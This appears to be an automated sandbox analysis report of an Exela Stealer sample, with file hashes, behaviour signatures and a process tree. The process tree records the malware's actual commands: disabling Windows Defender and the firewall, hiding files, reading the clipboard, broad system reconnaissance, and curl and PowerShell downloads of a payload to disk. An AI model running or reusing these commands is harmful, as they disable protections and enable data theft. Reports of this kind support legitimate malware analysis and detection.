| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/6092-119-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat
| MD5 | bffa0b357688d06c9f66c79a5d091f8b |
| SHA1 | bc20d3a70777c646a86e5c4b98f3a038f0821106 |
| SHA256 | d2e461a8175a5a964e2012329e72b339c43386e9ded1bb742fd7233400a9c9df |
| SHA512 | 36f23e89943ea250ee71ee832e55e3eba396ede87689e6f0fce478118cdf46ef4b06f068c2ca24e128a3cfc242119794411dc930e3d67434598410fc50cce903 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_howav04c.czx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4380-129-0x000002A9799C0000-0x000002A9799E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15562\base_library.zip
| MD5 | 65089bae0fe6af0f4d44313a26c87f16 |
| SHA1 | 18449f77a946a7aadc7edf19c82006d22aaa487c |
| SHA256 | d204f68e076e4662bc8a585ff8cdfe3f0fc602ecc2e2f12afbe23b25425869d8 |
| SHA512 | 0c710bcaa747debdee12fa181afdeba6b24b77280b07d65cfeacc6a7d327c7af6f8c559e01701d65f5219197ea756df023b6b04ed826ea31f27f74cb776b1618 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\libffi-8.dll
| MD5 | decbba3add4c2246928ab385fb16a21e |
| SHA1 | 5f019eff11de3122ffa67a06d52d446a3448b75e |
| SHA256 | 4b43c1e42f6050ddb8e184c8ec4fb1de4a6001e068ece8e6ad47de0cc9fd4a2d |
| SHA512 | 760a42a3eb3ca13fa7b95d3bd0f411c270594ae3cf1d3cda349fa4f8b06ebe548b60cd438d68e2da37de0bc6f1c711823f5e917da02ed7047a45779ee08d7012 |
memory/6092-182-0x00007FFF68650000-0x00007FFF6865F000-memory.dmp
memory/6092-183-0x00007FFF62E20000-0x00007FFF62E39000-memory.dmp
memory/6092-185-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp
memory/6092-184-0x00007FFF62620000-0x00007FFF6264D000-memory.dmp
memory/6092-181-0x00007FFF62650000-0x00007FFF62674000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI15562\select.pyd
| MD5 | c39459806c712b3b3242f8376218c1e1 |
| SHA1 | 85d254fb6cc5d6ed20a04026bff1158c8fd0a530 |
| SHA256 | 7cbd4339285d145b422afa280cee685258bc659806be9cf8b334805bc45b29c9 |
| SHA512 | b727c6d1cd451d658e174161135d3be48d7efda21c775b8145bc527a54d6592bfc50919276c6498d2e2233ac1524c1699f59f0f467cc6e43e5b5e9558c87f49d |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\pyexpat.pyd
| MD5 | fe0e32bfe3764ed5321454e1a01c81ec |
| SHA1 | 7690690df0a73bdcc54f0f04b674fc8a9a8f45fb |
| SHA256 | b399bff10812e9ea2c9800f74cb0e5002f9d9379baf1a3cef9d438caca35dc92 |
| SHA512 | d1777f9e684a9e4174e18651e6d921ae11757ecdbeb4ee678c6a28e0903a4b9ab9f6e1419670b4d428ee20f86c7d424177ed9daf4365cf2ee376fcd065c1c92d |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\libssl-1_1.dll
| MD5 | 6cd33578bc5629930329ca3303f0fae1 |
| SHA1 | f2f8e3248a72f98d27f0cfa0010e32175a18487f |
| SHA256 | 4150ee603ad2da7a6cb6a895cb5bd928e3a99af7e73c604de1fc224e0809fdb0 |
| SHA512 | c236a6ccc8577c85509d378c1ef014621cab6f6f4aa26796ff32d8eec8e98ded2e55d358a7d236594f7a48646dc2a6bf25b42a37aed549440d52873ebca4713e |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-utility-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-time-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-string-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-stdio-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-runtime-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-process-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-math-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-locale-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-heap-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-environment-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-convert-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-crt-conio-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-util-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-timezone-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-sysinfo-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-synch-l1-2-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-synch-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-string-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-rtlsupport-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-profile-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processthreads-l1-1-1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processthreads-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processenvironment-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-namedpipe-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-memory-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-localization-l1-2-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-libraryloader-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-interlocked-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-heap-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-handle-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l2-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l1-2-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-fibers-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-errorhandling-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-debug-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-datetime-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-console-l1-1-0.dll
C:\Users\Admin\AppData\Local\Temp\_MEI15562\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI15562\python3.dll
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\BackupUnregister.ps1
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UnblockRestart.jpg
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\PingPush.docx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\FormatGroup.mp3
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\ExitReceive.xlsx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\CopySplit.xlsx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UninstallTest.xlsx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UnlockHide.txt
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\RepairTest.xls
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\BackupPush.vsdm
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\TestUninstall.docx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\CompressTrace.jpg
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\RestoreUndo.docx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\InitializeBlock.xlsx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\GrantFormat.xlsx
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UseUnpublish.png
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\PushBlock.jpg
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\My Wallpaper.jpg
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\CheckpointWatch.jpeg
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\StepUpdate.mp3
Analysis: behavioral2
Detonation Overview
Submitted
2025-06-30 18:07
Reported
2025-06-30 18:09
Platform
win11-20250619-en
Max time kernel
100s
Max time network
104s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Exela Stealer
Exelastealer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Grants admin privileges
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\no defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Exela.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ARP.EXE | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
System Network Connections Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Users\Admin\AppData\Local\Temp\no defender.exe
"C:\Users\Admin\AppData\Local\Temp\no defender.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A066.tmp\A067.tmp\A068.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"
C:\Users\Admin\AppData\Local\Temp\Exela.exe
"C:\Users\Admin\AppData\Local\Temp\Exela.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "gdb --version"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get Manufacturer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\curl.exe
curl -L --silent "بتحط هنا رابط باتشك" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
